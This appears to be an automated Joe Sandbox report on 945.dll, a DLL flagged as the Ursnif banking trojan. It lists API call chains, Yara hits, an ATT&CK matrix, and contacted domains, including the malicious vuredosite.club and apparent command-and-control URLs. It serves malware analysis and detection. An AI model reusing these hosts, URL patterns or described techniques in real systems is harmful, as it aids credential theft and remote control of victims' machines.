            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E22AFAC ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_6E22AFAC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E22AFAC ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_6E22AFAC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress,0_2_6E1F1BAC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24E2D8 mov eax, dword ptr fs:[00000030h]0_2_6E24E2D8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24E207 mov eax, dword ptr fs:[00000030h]0_2_6E24E207
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24DE0E push dword ptr fs:[00000030h]0_2_6E24DE0E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24E2D8 mov eax, dword ptr fs:[00000030h]3_2_6E24E2D8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24E207 mov eax, dword ptr fs:[00000030h]3_2_6E24E207
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24DE0E push dword ptr fs:[00000030h]3_2_6E24DE0E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E223484 GetProcessHeap,0_2_6E223484
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E21FEBA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E21FEBA
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\945.dll',#1Jump to behavior
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,0_2_6E22EC14
            Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E22EE88
            Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22EEC8
            Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22EF45
            Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22EFC8
            Source: C:\Windows\System32\loaddll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_6E222C5A
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E222A26
            Source: C:\Windows\System32\loaddll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E22F2E7
            Source: C:\Windows\System32\loaddll32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_6E22CB0D
            Source: C:\Windows\System32\loaddll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_6E22AB64
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_6E22F394
            Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_6E21E036
            Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_6E22D10F
            Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E2229A0
            Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22F1BD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,3_2_6E22EC14
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_6E222C5A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_6E22D10F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E22EE88
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6E22EEC8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6E22EF45
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_6E22EFC8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E222A26
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6E22F2E7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,3_2_6E22CB0D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_6E22AB64
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_6E22F394
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,3_2_6E21E036
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E2229A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_6E22F1BD
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6E1F1ADA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E1F1F0E

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391141192.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391066845.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392901039.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392858796.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392613103.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392808909.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392529075.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391440627.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392768559.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390980633.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392386685.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390863638.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391141192.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391066845.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392901039.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392858796.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392613103.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392808909.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392529075.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391440627.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392768559.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390980633.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392386685.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390863638.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 448650 Sample: 945.dll Startdate: 14/07/2021 Architecture: WINDOWS Score: 80 29 vuredosite.club 2->29 31 www.redtube.com 2->31 33 24 other IPs or domains 2->33 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected  Ursnif 2->53 8 loaddll32.exe 1 2->8         started        11 iexplore.exe 2 64 2->11         started        signatures3 process4 signatures5 55 Writes or reads registry keys via WMI 8->55 57 Writes registry values via WMI 8->57 13 rundll32.exe 8->13         started        16 cmd.exe 1 8->16         started        18 rundll32.exe 8->18         started        25 2 other processes 8->25 20 iexplore.exe 25 11->20         started        23 iexplore.exe 26 11->23         started        process6 dnsIp7 59 Writes registry values via WMI 13->59 27 rundll32.exe 16->27         started        35 outlook.com 40.97.116.82, 443, 49731, 49732 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->35 37 ZRH-efz.ms-acdc.office.com 52.97.201.242, 443, 49734, 49735 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->37 43 5 other IPs or domains 20->43 39 40.97.128.194, 443, 49738, 49739 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->39 41 52.97.186.114, 443, 49742, 49743 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->41 45 6 other IPs or domains 23->45 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            945.dll26%MetadefenderBrowse
            945.dll59%ReversingLabsWin32.Trojan.Ursnif

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.2.rundll32.exe.960000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            0.2.loaddll32.exe.630000.0.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            stivers-ricsovers.com
            3.65.154.208
            truefalse
              unknown
              adpmbtj.com
              192.99.16.134
              truefalse
                unknown
                ZRH-efz.ms-acdc.office.com
                52.97.201.242
                truefalse
                  high
                  stats.l.doubleclick.net
                  74.125.128.154
                  truefalse
                    high
                    redtube.com
                    66.254.114.238
                    truefalse
                      high
                      vip0x055.ssl.rncdn5.com
                      205.185.208.85
                      truefalse
                        unknown
                        vip0x04f.ssl.rncdn5.com
                        205.185.208.79
                        truefalse
                          unknown
                          hubtraffic.com
                          66.254.114.32
                          truefalse
                            high
                            outlook.com
                            40.97.116.82
                            truefalse
                              high
                              ei-ph.rdtcdn.com.sds.rncdn7.com
                              64.210.135.68
                              truefalse
                                unknown
                                ei.rdtcdn.com.sds.rncdn7.com
                                64.210.135.70
                                truefalse
                                  unknown
                                  ads.trafficjunky.net
                                  66.254.114.38
                                  truefalse
                                    high
                                    vuredosite.club
                                    37.120.222.6
                                    truetrue
                                      unknown
                                      www.google.ch
                                      172.217.168.3
                                      truefalse
                                        high
                                        vip0x08e.ssl.rncdn5.com
                                        205.185.208.142
                                        truefalse
                                          unknown
                                          static.trafficjunky.com
                                          unknown
                                          unknownfalse
                                            high
                                            www.adpmbtj.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              s2.static.cfgr3.com
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.redtube.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  di.rdtcdn.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    ei-ph.rdtcdn.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      cdn1d-static-shared.phncdn.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        outlook.office365.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          stats.g.doubleclick.net
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            ht.redtube.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              hw-cdn.trafficjunky.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                www.outlook.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  ei.rdtcdn.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    di-ph.rdtcdn.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      v.vfgte.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown

                                                                        Contacted URLs

                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        http://outlook.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.growfalse
                                                                          high

                                                                          URLs from Memory and Binaries

                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          https://outlook.office365.com/grower/XdjQoGbnNj_2FSimi4F/g1n0hL2Ovi8UAiji8IT8vO/AZ50N9cBD7ouh/W9Stcu~DF64A2AAB8E5E3DF4B.TMP.19.dr, {7370D523-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.drfalse
                                                                            high
                                                                            https://www.redtube.com/rundll32.exe, 00000003.00000002.490596255.0000000002CFA000.00000004.00000020.sdmpfalse
                                                                              high
                                                                              https://outlook.office365.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7rundll32.exe, 00000003.00000003.390626600.0000000002D64000.00000004.00000001.sdmp, ~DFEA5774EEA628D538.TMP.19.dr, {7370D521-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.drfalse
                                                                                high

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                52.97.201.242
                                                                                ZRH-efz.ms-acdc.office.comUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                40.97.128.194
                                                                                unknownUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                52.97.232.194
                                                                                unknownUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                52.97.186.114
                                                                                unknownUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                52.98.168.178
                                                                                unknownUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                40.97.116.82
                                                                                outlook.comUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                Private

                                                                                IP
                                                                                192.168.2.1

                                                                                General Information

                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                Analysis ID:448650
                                                                                Start date:14.07.2021
                                                                                Start time:15:45:12
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 8m 29s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Sample file name:945.dll
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:28
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal80.troj.winDLL@18/7@34/7
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 5.1% (good quality ratio 4.8%)
                                                                                • Quality average: 79.9%
                                                                                • Quality standard deviation: 28.6%
                                                                                HCA Information:
                                                                                • Successful, ratio: 57%
                                                                                • Number of executed functions: 27
                                                                                • Number of non-executed functions: 54
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .dll
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 40.88.32.150, 52.147.198.201, 95.100.54.203, 23.0.174.200, 23.0.174.185, 13.64.90.137, 40.126.31.7, 40.126.31.136, 40.126.31.9, 40.126.31.140, 40.126.31.138, 40.126.31.5, 40.126.31.2, 20.190.159.133, 104.42.151.234, 20.82.209.183, 2.18.105.186, 20.50.102.62, 23.10.249.43, 23.10.249.26, 152.199.19.161, 205.185.216.42, 205.185.216.10, 216.58.215.238, 172.217.168.36, 205.185.208.17
                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, cds.b8w3s7t8.hwcdn.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, www.google.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.google-analytics.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, www-google-analytics.l.google.com, ie9comview.vo.msecnd.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.e9q5t8x5.hwcdn.net, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, vip0x011.ssl.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                15:47:08API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
